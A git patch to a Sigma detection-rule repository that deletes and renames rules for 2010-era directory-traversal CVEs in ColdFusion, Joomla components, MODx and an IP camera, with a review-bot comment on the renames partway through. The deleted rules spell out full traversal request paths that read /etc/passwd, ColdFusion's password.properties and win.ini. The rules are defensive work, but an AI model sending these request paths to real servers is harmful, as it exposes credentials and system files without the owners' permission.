diff --git a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml
deleted file mode 100644
index 7dc8e6df..00000000
--- a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-title: CVE-2010-2861 exploitation attempt
-id: 21032758-8761-4a18-8f66-bace612e2481
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the administrator console
- in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
- via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
- (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
- in CFIDE/administrator/.
-references:
-- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
-- http://www.adobe.com/support/security/bulletins/apsb10-18.html
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml
deleted file mode 100644
index ad2dab17..00000000
--- a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-3426 exploitation attempt
-id: 06621f7e-2987-4625-8c42-d66951a9da9d
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
- component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
- arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml
deleted file mode 100644
index 5e4062f3..00000000
--- a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-4231 exploitation attempt
-id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
- The server is vulnerable to directory transversal attacks, allowing access to any
- file on the camera file system.
-references:
-- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
-- https://www.exploit-db.com/exploits/15505
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../../../../../../../../../../../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml
deleted file mode 100644
index 080cc881..00000000
--- a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-4617 exploitation attempt
-id: ed14d2cb-8716-4ab1-a819-36d173e617ab
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
- 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
- traversal sequences in the section parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/15791
-- https://www.cvedetails.com/cve/CVE-2010-4617
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml
deleted file mode 100644
index cf20ed0e..00000000
--- a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-5278 exploitation attempt
-id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
- in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled,
- allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key
- parameter.
-references:
-- https://www.exploit-db.com/exploits/34788
-- https://www.cvedetails.com/cve/CVE-2010-5278
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
From 1bb99b4ece04264962895605d6b5fcbb1b34f3cd Mon Sep 17 00:00:00 2001
From: pbssubhash
Date: Wed, 25 Aug 2021 21:44:23 +0530
Subject: [PATCH 0581/1367] Readd
---
 ...aml => web_cve_CVE-2010-0943_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-0944_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1306_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1314_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1345_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1353_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1474_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1475_exploitation_attempt.yaml} | 7 +++----
 ...aml => web_cve_CVE-2010-1495_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1532_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1533_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1535_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1602_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1657_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1718_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1722_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1875_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1953_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1954_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1955_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1979_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-1983_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-2033_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-2036_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-2259_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-2307_exploitation_attempt.yaml} | 7 +++----
 ...aml => web_cve_CVE-2010-2682_exploitation_attempt.yaml} | 6 +++---
 ...aml => 
web_cve_CVE-2010-2861_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-3426_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-4231_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-4617_exploitation_attempt.yaml} | 6 +++---
 ...aml => web_cve_CVE-2010-5278_exploitation_attempt.yaml} | 6 +++---
32 files changed, 96 insertions(+), 98 deletions(-)
rename rules/web/{web_cve_CVE-2010-0943.yaml => web_cve_CVE-2010-0943_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-0944.yaml => web_cve_CVE-2010-0944_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1306.yaml => web_cve_CVE-2010-1306_exploitation_attempt.yaml} (80%)
rename rules/web/{web_cve_CVE-2010-1314.yaml => web_cve_CVE-2010-1314_exploitation_attempt.yaml} (80%)
rename rules/web/{web_cve_CVE-2010-1345.yaml => web_cve_CVE-2010-1345_exploitation_attempt.yaml} (79%)
rename rules/web/{web_cve_CVE-2010-1353.yaml => web_cve_CVE-2010-1353_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1474.yaml => web_cve_CVE-2010-1474_exploitation_attempt.yaml} (83%)
rename rules/web/{web_cve_CVE-2010-1475.yaml => web_cve_CVE-2010-1475_exploitation_attempt.yaml} (79%)
rename rules/web/{web_cve_CVE-2010-1495.yaml => web_cve_CVE-2010-1495_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1532.yaml => web_cve_CVE-2010-1532_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-1533.yaml => web_cve_CVE-2010-1533_exploitation_attempt.yaml} (79%)
rename rules/web/{web_cve_CVE-2010-1535.yaml => web_cve_CVE-2010-1535_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-1602.yaml => web_cve_CVE-2010-1602_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1657.yaml => web_cve_CVE-2010-1657_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1718.yaml => web_cve_CVE-2010-1718_exploitation_attempt.yaml} (80%)
rename rules/web/{web_cve_CVE-2010-1722.yaml => 
web_cve_CVE-2010-1722_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-1875.yaml => web_cve_CVE-2010-1875_exploitation_attempt.yaml} (84%)
rename rules/web/{web_cve_CVE-2010-1953.yaml => web_cve_CVE-2010-1953_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-1954.yaml => web_cve_CVE-2010-1954_exploitation_attempt.yaml} (79%)
rename rules/web/{web_cve_CVE-2010-1955.yaml => web_cve_CVE-2010-1955_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-1979.yaml => web_cve_CVE-2010-1979_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-1983.yaml => web_cve_CVE-2010-1983_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-2033.yaml => web_cve_CVE-2010-2033_exploitation_attempt.yaml} (84%)
rename rules/web/{web_cve_CVE-2010-2036.yaml => web_cve_CVE-2010-2036_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-2259.yaml => web_cve_CVE-2010-2259_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-2307.yaml => web_cve_CVE-2010-2307_exploitation_attempt.yaml} (80%)
rename rules/web/{web_cve_CVE-2010-2682.yaml => web_cve_CVE-2010-2682_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-2861.yaml => web_cve_CVE-2010-2861_exploitation_attempt.yaml} (86%)
rename rules/web/{web_cve_CVE-2010-3426.yaml => web_cve_CVE-2010-3426_exploitation_attempt.yaml} (80%)
rename rules/web/{web_cve_CVE-2010-4231.yaml => web_cve_CVE-2010-4231_exploitation_attempt.yaml} (81%)
rename rules/web/{web_cve_CVE-2010-4617.yaml => web_cve_CVE-2010-4617_exploitation_attempt.yaml} (82%)
rename rules/web/{web_cve_CVE-2010-5278.yaml => web_cve_CVE-2010-5278_exploitation_attempt.yaml} (85%)
diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-0943.yaml
rename to rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
index 07b40e00..d6be923a 100644
--- a/rules/web/web_cve_CVE-2010-0943.yaml
+++ b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal
-id: e5616a8c-a43e-47c2-9fd2-19b429581b90
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-0943 exploitation attempt
+id: 63b70c55-0d7a-4e2f-a130-11028352b6ff
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-0944.yaml
rename to rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
index eb080266..c38d952b 100644
--- a/rules/web/web_cve_CVE-2010-0944.yaml
+++ b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal
-id: c3eada81-1f9a-4a55-97b8-d3207d89228e
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-0944 exploitation attempt
+id: d30903f7-cb51-445f-81a1-f2948f5fb763
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JCollection (com_jcollection)
diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
similarity index 80%
rename from rules/web/web_cve_CVE-2010-1306.yaml
rename to rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
index 1a6e6268..70431ad7 100644
--- a/rules/web/web_cve_CVE-2010-1306.yaml
+++ b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
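Review bot: The new side of this hunk (and of every other rename hunk in this commit, L915–L921) replaces the `author` key with `Author`; Sigma rule keys are lowercase, so the capitalised key is not recognised as the author attribute and is likely to fail schema validation — keep `author: Subhash Popuri (@pbssubhash)`. Each renamed rule is also given a freshly generated `id`; the UUID is a rule's stable identity across renames and edits, so regenerating it severs any history, suppression or tooling tied to the old id, and the old value should stay unless the detection logic itself changed (not visible in this hunk). The new titles (`CVE-2010-0943 exploitation attempt`) drop the product and component name the old titles carried, which is the part an analyst reads first in an alert; consider keeping it, e.g. `title: CVE-2010-0943 Joomla! com_jashowcase directory traversal attempt`. The unchanged `date: 25/08/2021` context line is not in the spec's YYYY/MM/DD form, and the deleted copies of these rules earlier in the patch use `false_positives:` and carry no `logsource:` section; if the renamed files share that body, they need the same cleanup, though that is outside this change.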
@@ -1,6 +1,6 @@
-title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion
-id: 560cd98d-aa1d-451b-90a5-08ce5ab72d7b
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1306 exploitation attempt
+id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
similarity index 80%
rename from rules/web/web_cve_CVE-2010-1314.yaml
rename to rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
index e36b0aca..7faa239f 100644
--- a/rules/web/web_cve_CVE-2010-1314.yaml
+++ b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion
-id: 18019647-a68c-412a-bca9-626618b1a79c
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1314 exploitation attempt
+id: 24c87e4f-7206-451a-9164-364ca4f3c388
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
similarity index 79%
rename from rules/web/web_cve_CVE-2010-1345.yaml
rename to rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
index 6c3fe8c8..25b32926 100644
--- a/rules/web/web_cve_CVE-2010-1345.yaml
+++ b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion
-id: e70e977a-aaf3-4ec1-a948-493caea7cff3
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1345 exploitation attempt
+id: 5f723f65-f584-49f3-87c0-7babbae20d9d
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1353.yaml
rename to rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
index a1c006bd..1ba62bda 100644
--- a/rules/web/web_cve_CVE-2010-1353.yaml
+++ b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion
-id: 559e6e69-af61-407c-9949-a8602cfb6d95
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1353 exploitation attempt
+id: 26d15692-1cfc-4427-8e7d-9a364c2628f3
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
similarity index 83%
rename from rules/web/web_cve_CVE-2010-1474.yaml
rename to rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
index c023e301..21b6dc41 100644
--- a/rules/web/web_cve_CVE-2010-1474.yaml
+++ b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
-id: 06040396-89e0-4919-a186-a3ac48eb2d85
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1474 exploitation attempt
+id: 5b50ffc4-dde4-4905-9da9-eb499ee53971
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
similarity index 79%
rename from rules/web/web_cve_CVE-2010-1475.yaml
rename to rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
index 5d2fb64e..4786c685 100644
--- a/rules/web/web_cve_CVE-2010-1475.yaml
+++ b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
@@ -1,7 +1,6 @@
-title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File
- Inclusion
-id: 568d0a33-0052-47bc-a04e-8f7e8f05e12d
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1475 exploitation attempt
+id: 69295f5a-428a-47d6-bf4d-a93bb23270ca
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1495.yaml
rename to rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
index b3340862..9e3ef52a 100644
--- a/rules/web/web_cve_CVE-2010-1495.yaml
+++ b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion
-id: cb3ac5e3-de9e-44b7-b0f5-b18a13ba3c69
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1495 exploitation attempt
+id: e21410ad-5016-457a-a48f-2da871951471
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Matamko (com_matamko) component
diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-1532.yaml
rename to rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
index d80c1a20..bb5f49b8 100644
--- a/rules/web/web_cve_CVE-2010-1532.yaml
+++ b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
-id: ea2cd3fd-60fc-4945-be6d-e69340a0159d
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1532 exploitation attempt
+id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
similarity index 79%
rename from rules/web/web_cve_CVE-2010-1533.yaml
rename to rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
index 1a181a6a..31ae9336 100644
--- a/rules/web/web_cve_CVE-2010-1533.yaml
+++ b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion
-id: fc58d241-5812-4a66-acad-2c9370fc2975
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1533 exploitation attempt
+id: 2e547af2-0fb1-4d26-829e-fb42d959133c
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-1535.yaml
rename to rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
index 80029d7f..d2ee67cd 100644
--- a/rules/web/web_cve_CVE-2010-1535.yaml
+++ b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
-id: a4abca47-5c67-4b8c-a549-4e04f43ce751
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1535 exploitation attempt
+id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1602.yaml
rename to rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
index aba67724..564faaf9 100644
--- a/rules/web/web_cve_CVE-2010-1602.yaml
+++ b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
-id: 25e8e854-0a76-4f55-9b7a-9769ea2dbebc
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1602 exploitation attempt
+id: d79bf48d-2705-4da1-929b-37e07764998f
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1657.yaml
rename to rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
index 1772f0c8..447bbe51 100644
--- a/rules/web/web_cve_CVE-2010-1657.yaml
+++ b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion
-id: 4fbedbee-ea11-4a65-9c25-bbb0d74f58fe
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1657 exploitation attempt
+id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
similarity index 80%
rename from rules/web/web_cve_CVE-2010-1718.yaml
rename to rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
index 9e4d9a4a..148380f1 100644
--- a/rules/web/web_cve_CVE-2010-1718.yaml
+++ b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
-id: 92b06e2a-66ae-47b3-a135-fd2759f05902
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1718 exploitation attempt
+id: a538251c-d600-43f3-8051-c3a83a5e8702
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in archeryscores.php in the Archery
diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
similarity index 82%
rename from rules/web/web_cve_CVE-2010-1722.yaml
rename to rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
index a7765c23..94179320 100644
--- a/rules/web/web_cve_CVE-2010-1722.yaml
+++ b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion
-id: b0d9873c-08fc-4389-89aa-751d7d8d682e
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1722 exploitation attempt
+id: 84715b18-505d-4252-9470-03c98a3006e5
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Online Market (com_market) component
diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
similarity index 84%
rename from rules/web/web_cve_CVE-2010-1875.yaml
rename to rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
index e38a061a..9bd796a5 100644
--- a/rules/web/web_cve_CVE-2010-1875.yaml
+++ b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion
-id: 454a58b3-a30a-4577-8175-a93d0febcb34
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1875 exploitation attempt
+id: af757e17-ad81-4a28-a551-49c17aa5113a
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Real Estate Property (com_properties)
diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
similarity index 81%
rename from rules/web/web_cve_CVE-2010-1953.yaml
rename to rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
index b5cb130b..4f10cf4e 100644
--- a/rules/web/web_cve_CVE-2010-1953.yaml
+++ b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
-id: e8b2e18e-5a9e-429e-9cd3-a839701736dc
-author: Subhash Popuri (@pbssubhash)
+title: CVE-2010-1953 exploitation attempt
+id: 0fc4af77-6974-4e50-bf5e-9f175304eb54
+Author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
similarity index 79%
rename from rules/web/web_cve_CVE-2010-1954.yaml
rename to rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
index 4b1a6939..23ef2619 100644
--- a/rules/web/web_cve_CVE-2010-1954.yaml
+++ b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
-title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
